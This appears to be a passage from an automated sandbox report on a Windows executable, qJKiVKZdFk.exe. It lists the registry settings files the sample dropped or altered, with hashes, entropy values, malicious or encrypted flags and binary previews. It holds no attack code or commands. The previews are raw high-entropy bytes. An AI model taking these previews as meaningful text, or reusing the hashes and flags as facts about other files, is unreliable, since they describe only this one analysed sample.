                                                                                                                                      Preview:regf.....s.1?..g.}..c.....C.j..i......h..8."..z.GH.....KF~.z..S.D..be.._<-........D.T.|X.,......".h..1....#.C.|..c%4...s...R|.d.eV`|3s..(..f..3...|.pX..:.#"q...-N.W...a.R..K.....s.."b]..M..=.k....&;.d..!.}..k.....|....+Y...n..l..........M.......6..8.....6J..E..E./>.CL;..:.:H"..C.q..b...+.-..Cb..z..h.6...W..|q&....a.FpG..0.@FM...,.g].-c).....d$..u...pgC....2".. .D.....{./.MKEB\.&.....Xt....i..I[0.uWe.G...Y(i.#....1i D.r.....zY.J.r:.....|s..p2..+@.32..:.S.4xx.....2.s.\2....'I...l[.......BO.Z|..7`jz......b.iC;W....1.$.[..T.+..wP..-jBno-\G..&....Z..[.].+.b....:.X.S.k.FC.Q....\....d......n.....<&.SB1....f.xN.U.@)..?.P@.B..._.w.0..N<z0yf..;.S..2.P5..rAW.]ak."QS.%%..?=.....g.GH..{...?..YB[...m.jf.....}...6Y.4V......&PV_....{........p. .# .Z,..'r..w......k."v.i.....Tgi_P..6..[..<...{.?..q.C.:Y.T1..ac......5.:.p;8O.:.=.x.0Z..H.(..e+gK..$.x..cd...i.<..i....7MO.\.?...Yn...$..r......C;..H.....$..WP...d.../@w."...S.~E..x.Lq..{.......L5danv.3.vM.......X)F8..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975291807809696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:q7Xdcilkm0dlwPqYndf+ikdFyQby6pdzOr:q1GdlfY5SFLpc
                                                                                                                                      MD5:52ABDF1EB3C666A6BA9FECB5DECFE616
                                                                                                                                      SHA1:DD8589E4C8363EE5F5BEDDF44FB8B9E207A99985
                                                                                                                                      SHA-256:882FD79471D021978869BD88C68687C2329BF4CB6D9BE73272541153365F3D26
                                                                                                                                      SHA-512:D0261933BBD786F9B27F6A46394AE0AD518A5C58C173C7A99A77655616193BCE89BDA620F771CE2B10B9A2BEC04ACAFD2093586490497B3D17FE1D6F86605F31
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.j...$.WS......w_..@...g6I{(...LX....o...fF....t}..)......X..>...}.k_i.A..Ou..yUM...#FmR.&..C..Y.La.NoMXJ......j...pK.Q.j..n....#.*...g.,$Wq......Qn...c...Sk.....F7.a.3W...(.]...7.2@....w...O....T....@.NH.'...e.n.........|V..%dR..y@)V....8......PP.q.TZC..I...4..7W...L.Z...c.....a..@.2Zgpc..(:vK...Tq..~...Ii...~.\9...uS..k.`........Y.z...c_?.........X....Z....e>........R.gq..a......H..v..>.....<P...-^X.GF4p'...]......[.-...k.p*a..j%....v....j.......)..sA9......LM7m...0.d.v.rHi.. ?.......m...Q.>a]o66.bq..T...X.TH.0.7C.l..g..U!.f.t...N-.N!Fz..R....5K..^9..Y... .&/..].n....s..A.....]wi.Rc..(...]e..{q....r._t.m....9..d0...4.\.*:Ze.'....w...-..o.9m.Q...\..0f.:.L.o......u..*&.Ihh2...Iv.."(...@.}..P9..m..3.%.E..&....f....*. ./!.^.-h.,..gg.l.x.n..R.WP...H~.&..o~.J..5{........A(.o.I ..f........_bV.r6.h.?Rf...G..?....-...(...z..W..#.{...W.i.b.9.^....s.Px.\..S.G..+....<....3....zy.....w...........5....Pm....>....fN.@....)...|#.]...L%u...y......2q..ple^m4.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977110392785588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Clee0+t25yiW59mZSYkZSRcoBkWA89giqJJuYkZgOQS7rso:yee0+t2259mZUUx58TOXv1
                                                                                                                                      MD5:28E5F259A8EE4C55D9DF70620E21AC60
                                                                                                                                      SHA1:5C8CCB0C057885C4ACCD0B0198C43D38997265AE
                                                                                                                                      SHA-256:3A95B9A1114850C18F53DC070DDECB502649FB5ED1F983E7C34E6E909BAC7D65
                                                                                                                                      SHA-512:0509061213382381642FDF4D04E9FF375B185EC1410D1CCDEC4A6B1EA2BE9B8DDE11A46B5CA283B8CE2290BFB00A5D5269D53E590D551B5470A04B52D7288AC0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....._'..y...NSGcL...`....7\cO...M3.A.....R..j.p..5=U...U.........(.rN&..=l....a.....?..2...(...}.....:......P...k....ka....n....b...bk....i.).j.ap...`tt..dU.sU"9......Dkj....X,.<..T.....D..NBz'...s.5%.k.(.o.`.......s:..;.....<..c6.D.D.C....d.r.acz!.....}.4{..Kc.=.?T..Z............{.-.....G.r../...1f.....>)y.!...C.!.B_.F.V.^.d................M.........t...`..t..~.....].X.n#... 5W8......Qd.m..l...("Hm...*....sQ|.KS'G.P.n.3.x.)..nI{.d.@....._$....|....R>..j(.T..(...*B...U.*.p.UD.H8E...].g+.?.P.?.......b......,.....y.....,...6H0fX..h.&m...'M.S.eC,8...4PX~k!.$.....w.C=...F.#A.H^...u.*.uJ.O.o,...7..!...%.r.l.l..Hw..L.#.....].J.....d...M.n[W....5.......+..W....G.....(P..H......_...X ...0.h..75..._H.Z]`.._....0..f.+.w.ZK...."...F:......=..R..=...8)M...~.:.E.i.Wn.;.r..|.......-I.cO>.Z.OD.`...9..uus..eX.QU.Fd(..X.. .Q,....O...p.....#B!..7.g.F...4N.a.L ..Y....e.L.by.......3.Y.`2.q.f.y..A...0...e..O.i..D@P..5.....N.n........K.X.9..%.7.Y

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9793764120438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DHPiPdmijS9MJCsrzvl7hULI1WISdfvtjN+Wwg1i2k/ya0Hm9Ab7GU:D6ArSksrzppAISdfljN+WwcwaZHm9DU
                                                                                                                                      MD5:900CFB3E7F1C66945ECEF4821105B04B
                                                                                                                                      SHA1:ED4DDE454423BF51D92FFC7800041F96F7687322
                                                                                                                                      SHA-256:0AABC100963412D047959F83FEA29F4A2BC77E0D6B46A0E2CF7250D6FB3A1D27
                                                                                                                                      SHA-512:BABDB163F67A6C8B56D0C307324210313DC62D9563C5EE0C077458A33AE0C2B743878CA22336368F003F7837D00501D8B90AE08A76A9EF96EC9FBA6205E0F8D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf."..Pfv..<..x..C...f3X.hO..Lx+0K-....V..lz6...9s3.,.*Cv...M.}.r.V.X;oI.b}....~..>....<.$....O.5r{U........KA.H..+..o9.%.'../.]`.jOd...M..g.,5.p...qo..r..V.5..O.E..G.g+.f..P<JAO.5.3..f1&..p."b>..-:L.._O1..n.%..E..`z...`?.._...R.6..K...`.L......Y.L-..K......"............}..%.U...L.0*'.........`..g....`$.......?..h.#V.,.L.KG.X.).X...,P... 8S.x%.JN.d.....@.....I..);6K.._d.Q..y.\.C.ec....~+T.....2....$.j^..#4.F>....b.G.]?m.B"...pF.....^..:2.\....='...PS...].IB..Q.F......$U.#I..3.w..3.a;l...m..H.....YH.Rn#.t.k0fP...ROXD......z~J.].@]..g.`....}I.N.N.WR.v=...../...T..q/..Cm....tq!./.SEo.....3<..y.[.=..$..c..7..*s<.)-$...KR.f...K.o..t......e.H}..V..........I.....P._....(........_..4..(w.H..:+S.&z..P.# w..2.2.)q..mI...8.#...9?......&....l'..}.X..%V....5...a.4.c.]..0.]VI.7..B.A..l......^.#h(.6U..Bn....7.0.pR........ oo........j*G.Z..6bU[7....W..H.....5 ...f..9.*Y......0..(#p:..*.F2#.......R;.,[x*. .........zJa..A@....6....{....x...O.9n...*..;.....v..'.*

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980309334729296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RTNtg2Q8T91kPLnyTYRct41GoIT6lrolnMb9S:RZtg2LkPLnrRiojrotaS
                                                                                                                                      MD5:BADEEB01FEABBF0D014B1C9CE0EA2273
                                                                                                                                      SHA1:3667EA6E2308A1FD96209E78807B98726FA24D36
                                                                                                                                      SHA-256:34319184767CB8BAAC73F05FF77EEE283C900CA9552B2E0BD23B0DB76CCC96AD
                                                                                                                                      SHA-512:F444ACB4C7B60EE142C878C71DE6B198148D23D3B023628D05B764B444879B838E7594FDAF59E864A8BDDE179B40675918A99346FB83AE5AEAECE507BF6784B2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..R..{.....3......]^.+..9,._..U.pH.+s...s...=...^n". .w...=..t.%n.=.f.Z.T..~...F/.9..+...jH*. j7.@.....c..RBmFh...o....%AJ+.P..F~..S...............e.5......~.].....`...;...5Jv..A....Q......Y.'..+..i.|.V0.RFf_.f.#...a...1>.y.....J.c..w.......-Q..c....Z.*...;...l..^..c.._?SIq...x......^p........N.c..:.....^.fH..H.[............@.....|...R`r.w..GX....@..M7nv.*..vOC;. H.g.*....=5[?)]./..i$....E...I..o.=.0d..E.0F..0E....L..T.O...xvg..hJ..h.[..2....A;)....T.".5..M..\D...G..F..4.3A..Y..b.....p...,.=.V.e.-".&.?.=.J/]b.V..'i9....3Y..&...(bC..{n9..$7.\uu.r....wI..@.....+...`1...U.....#.....Gy.....j....~..i..78.{W..|h..{.1..l......T..o..0'.6....t...x.zR.V.>.ou:..h..F...Q....T...;...i..w..s....O.......,...f.Y..<.;T.:.d....Ej!+,..J.(..oF..y......No.....k.U....x.d.`...].."...|...s..r..{3..`R.S...jT.B....%....2.T........pr...O.....&?...wA..nLMe.sfC...I....X.5e....?.._...;.3.H.A..C5.Z..T....z.T.s.H.7...!.g......[..1x7T.{.....\.K.`......`'....

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979143251356616
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GXL/er4GiWC4DZ/pj7jw4EIjE0n2qgebO9xKUHd5skk3fUz:GXLlGiWJRHjxEIF2qgei90CckCfO
                                                                                                                                      MD5:BF77B35084B4F0B5AFE7F908C5B5F7E0
                                                                                                                                      SHA1:EE692BB26405C6E63540A222913196A6A4BF7474
                                                                                                                                      SHA-256:7170002DF234D536398DFFBC8BE4621CC5DF33B210DD042DF4FA6032A113B986
                                                                                                                                      SHA-512:094E002451641945A27F2FFF264D3A2775BB719C8FF5AA8E1615217666C014C7BF07CB2E325873FF5D254BC67AEDF36374C2A4BAAA361802C341BAC899300DF3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...x.#.m.....n.L".{....?...&.....<.I..9..4.R.$.g....u.G..D....y..![$ .>.+~.r...2<G.p.;.=.3...x..(..8^g8.:..Y....f......%I.4..&Ph...!y7.L....B.m .!~...[.?.....0C..>..K.x.......{...0....5.Vt.#.....o....A.0.. .q....(......c.Fv.X.<...../....v.....o.....D....\X..H`...\\.#[.%Q..<.=..`.BR...;..v.^p..YC]..Ln..dsh.d.b..]..K^..XiT..o....y1.c.6.;"gp.a)..Z..v.h.p........3(._.k..E..rY.....}...*.6.u.X...M2b.R.W.?...g..ME(Ld...c.&..0..}|+?CL...8...\OQOm.....uo..7$.x.......)#..f.L.<zY.7>...(..!<....;e..U.#m.n..6...5@.Q....J....]._...E.T.....I.=.H_....-.x.='.._......A.R..\.l..Ae.....h.e..~.L`.A...x.).>........$+.FE.Pr.....Y....G`.EjjJ.{.G,.-..."f...z_H23uC......9.......=!.... [.mTv.%.I.i\\.5A%...q...D...........b}.9W.....+..&.(.x+u.u>..0..l.9.....t..0.....C.%........a..1....}.;....Va..S....O.:S.|..$ ...d....1..%.N....V...|Pd....S9\......A....Cu..3=._..j%g..&.. ./.4.J[.x.}]...^.....cJ|>r.}K90....H..5.h0..)N...;jB_.m....}.WF./RP.\...t3bE.6.....J..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974591759950497
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pZIsZ5g/0NSkdHT/KwH4iqGqTkeM+MvUk614u2/UW8:pC0XRtH4iEvcz614ZS
                                                                                                                                      MD5:536E78F819E9C3FCD8BAC88EF5B29165
                                                                                                                                      SHA1:9F8B1C230CD127C452F54C27055326ECD41DB9A6
                                                                                                                                      SHA-256:D831BB6B38229BE39255DBFA0382C0B062C49BA238C9C9143F00B0E66CAB1A72
                                                                                                                                      SHA-512:2DBC5DFECC0D063A6610F622B44ED959899EDF489BAB1F53AA749EA345F2382037FB251027868DA0CBBE27583957E73D6C911E9B8829EECA0D19424DB13CBDDD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..g..%.mn......_.............4N.6.;K...IOJl$..d..H...b..'.UCe6.q......AcH..b....p.3\...h..v=R.".'.K.Sp..E*.9..j.i...*..B.....>.d.S_.@t....v......&......<..M.v*e=..QD...{.]?X0...`.E.um)..*.MBJ.<...Q..@X...8.h..l.o<.H..M....j.....5u....=.3.v.X,.vi..H._^t........~..$..m...vnSPOg..+.....s.....H-..#......:I.qh..w..F.m...J>.....A%8....}a^....-....*[.-...\6!.Y..h..k$D.}.v....".Y..y.......m.].6..h..*..P.Hx-P~..}v. ]....Y.......Ty6..#5=!....wO.a.%OjGHZ56..9.w^.w4.5'D..7*..57.W.=E.w.P..z..]^c..{.!.W.......U.BXv..B..T...UH.?Y......k].K..Z..9.,F......1}.3.mq".XA...8..nh.a{+.}..@j...\k.......o{..:0..5.....9....._....&|..S4F....E.#..'.!..Z..j.;>D.N8................GJ........a....!(......0.<.^E........M.....< *M`V...0...nJ.`..M..u.9^kR.(..?.5.I*.l5{....>kj..i....Mk......Y..Tg...F.q@2?....6...V =..=s.....!..P....w-....d........e?@.O..>....W..).b.~JK6.......`..-..=<.l..r....n....')..........Nx...f.x..`..9...3..@..<z..Y...............%H-\.A."<(..n.....+...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978183388455563
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:VOpkiS0lWghDHJZa1SxkAQEtFbb8307uWBL0c1P0T:kpPvlt1va1Smg3boMZBL1sT
                                                                                                                                      MD5:A15896A79F6BE23657C1B178B8A4E862
                                                                                                                                      SHA1:3036236EF137586F2735B5E5A1EA78F7B5F9F85C
                                                                                                                                      SHA-256:2A314D7E10E99DE24B776DF976AC0BC4B27FE1EB8D697A09E83D12C786E21CEA
                                                                                                                                      SHA-512:B581882C018B37F8DBCC773AD4569C67261E12BAE0FEE62CE1B384F560766E78AFB31D01C5CEF9E9290475DEE031DFE85149C658C22C1FD23645F346F64F3DB3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..E?.h...Ml..P.o...4l.... ,.?DY'.....3..<...:...gq....+[.'...x.....~..=...uh.........g.=.z..n./.%.!M./..~!..N.3a.~.Xi...dqR-\.x^].y^&6o?...s.E..#7...S..^.A9."p."...Yb..n.e...........:T\.{*C...=.?[F.2v......y..p...~.......7xG#..yqs............P.Am...#.Y.#...s.q......_hitoI$6..8.>..\U........8....u.....t[....K.....5..Y..B.\..E.._../.Y<.L......_...^I..84..mjXTQg..m.$..D.).Imw......-34..y2....E.G]FU...*.P.p$.a.^H....H..z6.c..=..%4....g......P....nnd....U.6.YL..\N..........;HF3....8.v.'g..xn...=.....}.=.Qu..T.C~X...CZ..E.0...Ya~".....I.h9.ql.2.l%......a.O..$@.~`.._..a....O...\.|.!dL.@h..[...."b..8^!...8b.2..-..}F.....Ns.I.y.v.jM.ia3..6.k.S.__.X..6zz.4?...7i...g.V.<9.......0_...H.}.P..m..pQ..L. ...,*..f...Ag.pE.y+...P!.Y.r.{.-2.q.B.W+e.M...m.].T.R.......#.....3...P....C....b.J.@....l...G&...D.9....;.z.z...V.....P.C..a..;.^.1.~#bu.....O.|.pX....o...z#m...u..RW..Q).-.e"gz.(.....X.^..^S...;u.N..:6.........A\.......g'.}I.=.)....d.I......o

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977644709609756
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:vpccMbdu7DRvn1/T8bNznw/dzjjmmbxoU/jKWBHjcjSaaedZc/l:vO3bE7Dl1/T8lgjmQ1+WBDcjHaera
                                                                                                                                      MD5:BA402898A8D75AABCB28D43902D770CD
                                                                                                                                      SHA1:31A8C0C03C89112CAB9A03FB093F6D6BC405BB8A
                                                                                                                                      SHA-256:39A898232850848952B53F26B72BAA0FFCE9CAB16BAF3C38A3E82199876431D5
                                                                                                                                      SHA-512:9E8399FE93F0DDE14343F905F0663B98A7DC76090C2B57238ADC072E0FB7AC8989A969759346617C989D4A234B162644C116D47625C7D61D152173BC24FAD63A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.n..ZA`......Z.LJ.N.....^...b.j..{....r0....AX.}..<_....Sl.FVT...K'...k*6y.\...._....p.~97>.P.B*_..O8...|......]+oO...8^.}..0.G..S..o*.!8LWdii...u....*.lT..K..T._...E.#..J..Igaw...tMq.....'e.?..&yW'<./...2g...C)G.?L.j?0.....h|......\..=-..F...4.../...._.. GV.i.).......9.....`.&D.........t..=D#-qc.n....^rd*J0fE.Rn..:.:3....~.R..G:.K.%........t.-....aX8. ...Z...k.Z.7..._.0...(.,....W.S.$.. ..n..y}7.A;V{...@lN0.:AXo..;.......ao..RJ..4y..v.`H-V...3K...O...Be..a...=...5uIUk.bHs.(..N.zr,@.m..o../.x0....e.....`.I...<.....+;.......$K.....^P.X....~.nf.4.4.........p......S...%y..Z.3>...A.*m#........]..p....S.KUvy.*..oF&G.`.....[......!j...Lc"..2.." .A...c.nL.....dhKh..ag..\".....I.]3.8..pII.P.p............\........]h.3H.I....O.......%....@YI....5Bv..].j{r.L.my..R.=..R.4......}.%.../F......\;{0..u.Y.`...0..dy..F$...r...p..6=`g.......sl.a..St.E...........*5..{.@A.I..%...H.O-n.zm....&...+..#...}.HJ.).;Yjr@.m...dA....E....-...N...^'.w

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):131406
                                                                                                                                      Entropy (8bit):7.99853707186619
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:9AjOjGC/7T4PvE+WIyWb18yH+Z5tdYvpm0mQBzI:9+nC/7T4E6yCiyH+fCzI
                                                                                                                                      MD5:55C5233BAA0B4794D838D365EB48549E
                                                                                                                                      SHA1:2CCBCD3833ACA132ED0557950301811F678A58E0
                                                                                                                                      SHA-256:D55820285755630D061DC9651E3F85267505B8D4D5C13CC30037A13BBFBB680F
                                                                                                                                      SHA-512:CDBD172A030D62557991A79D2EDEABF0030D7853223C7F18A666B6BF1FBB0B0C0B8A9938B774E1FE3648ED6FF56352A24DC3D9998799BEEC594C1DC53F60BB10
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf.^..d.........~.n....(.:..\!..j.o....9E.T.......(.<@......IX......K...3d{....A.O`....5...l...r?.1.......Q.{...l.).b..)a.;..,#.g......9r?..79.6.Z.CuC..R.Z.-.Hk@..1.. I...n...m..E........=x..:Y.....U...-.znK.c...V...K*t&..`...63.?i.o..W..R*.d.p1...N.....jv.x.g]...O...&&...w....vp~.r<..b.Zw$RN..s.QFH:@.G.a..D4...H...XDZ.N......l..j......@R..c.s0.......GM.....[c.8...R(.f.vFi..H...d....[sO.f<..l7.8.,.f.h]..=o}b..L..=..Pb.....{Q;|.K......Z>...0..h..q..0.)d.....t......:i.c.......u.e<..Y..q....Y.!.,;..~.!`.:...v(}.#......g...*.#..v.phB..I]O.B.4..U.....8>.E..}H....d..p...B..|$Vz...."s.*<$4.Ek...Q....<.>{o..8.......i.....9....Z{.....;Ra..LZ.&....o.k.#:.^ .L.s.TV.v........../=.. F..R.y..\..o...|.-s>3U...OB..L.x.0..W.......'...bF..C}..a...:.\....p4.1.....6.X..I..#..F;..C.a..I.y...69.rdz}.B.......b....u,.F.T.....Z..}E.Y....,.D...Z.4&7]b...8m....r.0...-4.....=......P.\...nE./..L.<.E.D...SF.R.[E.14=..xg.1B.Z.@$9.A.[.:T..0..*...=..~.a.._EY.Z.N.5.#2.....B@

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):82254
                                                                                                                                      Entropy (8bit):7.997863066122063
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:dv32iEG9QbZexcewfVY+Pb+X5HlDZ7l5zVR/KIqZIfKUNfjxG:LpQbIpwfxPb+X5FDZBBjKIq6hNfjxG
                                                                                                                                      MD5:06A0EA702E39CE829EA2B0669C0F676A
                                                                                                                                      SHA1:72B01C75E46A57C068147C9CDE5AF6FD166E9067
                                                                                                                                      SHA-256:4B95ADE7BEC8693A25B5110FD3D5135FE4556E1951701D70C8F5E46808AC8693
                                                                                                                                      SHA-512:B49E0485B98F7EE35519A4982BA917F5A95AA0E9584F0502EA281509DFBC73F3481099FC3F1B13903871BE074B20B220522709EE3A8E1634BD391036EB03DB44
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf..U.[...."..W.f^?A..n:.D........h.}Z..X.c.........`!d.....0V..J...V.....S..f.j.$.*0.>...0...=V......Y0.Dsh.A.....#..c.H...1A....A..j!....>..P.'...H.VY.:4Gm.q<..)..O{...I.`<.Gw.....s...Kq}.S...5..."h.}\....c..4..{..:.....=....O..I..X...#q..F....).@R&u..z...n...1... .H.......t.$..Vi.?..M".l,..^...f...W...&j.BT.[D..*.[A..x..x..w.8.Q..g.A[.7...xk.+{.....|..;.|..V@H"=$o...p.....G..z.Sx.[..6...D.i.Q............?.L..z.P.(..r9.h y.R...X.....^...t.3.Xj....B...|.{..J'e...r.:.......X.DF5...U....o.6...Ff.cY.89*.{.~.I.....I..9nI..s....|..j...i........l.k....G........<.-Qhi~..Z.`9.v.y^_S0.......U...I...x.qD.......5.A..(.$..f#..q...Y..1.{..\FWk.Q..ibj..........f<k_..+..c..xK_...Y.Z....h..K...`#..n>.s.!{...{MR.g.U.@0.1.u.....o..N...[J...DN.`..<..V..-g.....S..>"C..J_.s6..c.].M......B.D..&..|...wGN.S.2...Y .\.._........r..Q...w..N......-.w.s/j'6..L......>.sZ:.4..`.$.L0o.s&..T.=Kh...z..FE.....X^..!...~....t.9.'.;c:...Ww..P........)....#S.^.8..v.)]

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41294
                                                                                                                                      Entropy (8bit):7.995823784027173
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:vHpAduJPz+Dm5bGyO/QZv38GygqZma5fSQIRSThHeQ/nQld8JJW8nQbrcS4PHFri:5aD/ydvByEgzIEThHeQfQEjjSqHmfr
                                                                                                                                      MD5:533EE67AA5DAC0CDE194E73EE717A7DF
                                                                                                                                      SHA1:2339513894DC83D11016F59DB28F50E465694B64
                                                                                                                                      SHA-256:E4A8664A0EC9041B4CAC71DA30DC9375862DBA683561D005750079AB48DEA87D
                                                                                                                                      SHA-512:3AD7B9AE19BC90808944C0E304F54659917575FE03AD498088A9B2D3B85104927990ED6B5E768744AEFCB4EC08D7E62191288882E1ECCD41C0D324F531CF6BC4
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf....'...p+_.~.../.Dv[..._...L....e.-v.........!..76.i.S,...;).Jr...Gf........F.m|..7=]a.,...........b.....=G.-^..NE.T..>d|nTr.c <T. ,..m....g..jt..[.z6s._b..Y.HT..7D6A....X......~..-...A..l.....[..4.}c. v.tU.]/...u..[.6~.d]....;y....na.....>..6W.^T...H5n..i..?...D...H7...;.6.....U^......._R....^R..F-y.{.I.H.x.a...3..0...a.1.W9.r=.9r.E{6.t.;G..L).>..2jm.'u>.1..E..K...D.....l.w. .......!.....w( ..V*^."O.9..on...5......!6N.....}.....].I...FpoJ(.O.pQ...._o....".I...+...G..._=.4.4ty...k.olE.[./n....."a.<.gD.........R................<./U.....[.=.rv..|:!.S..i...*.>..*"q.V).....V............P..m......%...h$7I.i....~...O....#pB...`Q...^..i+L&.....q...T.%'s..o.M7.\./.....H.......}.2Ov.Z.".!.....a..e.N.;%^.U<.//.Ly<....c...6P.z..;4..\@..."..H...pa.g....#8.*.....}!m#+\...:a>.7^.H.J,..;..+....b..8V.>..Y.\M........J...Y........V.+.".$Df..`..d..?.F....._..ga.B|.....-...O..*;...c0. .@g..#.J...G..e..c..:gS.AY_...@.LY..~.......s....2..b@2.<S.NB6.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974167615650112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:lu+ui1XPsJDPc7UUGFt1KIP9un7RbFWfgoyggiub94hYv1bTgnxdaAgEzIy:lB7xPsJDPcUt1xmbofvSp4hI1b2Lhg/y
                                                                                                                                      MD5:485D23AD9BB63174ADDDA028FF7404F5
                                                                                                                                      SHA1:BBA86CDEF87186C593930F7967BCBEE1704A3354
                                                                                                                                      SHA-256:2A0AD0A5FBCD4B37BFC606FF56EA045AF16BA74BD69CC2C5919930D575CC51B2
                                                                                                                                      SHA-512:6FA470945C59EB047EB51FF87C998C0006B9C6E8261230DB616C526B54F35B8810BEFD0F4FD3858D4465BE147FAAA94E335B583BE2DDC27DC58D02075DF8A942
                                                                                                                                      Malicious:false
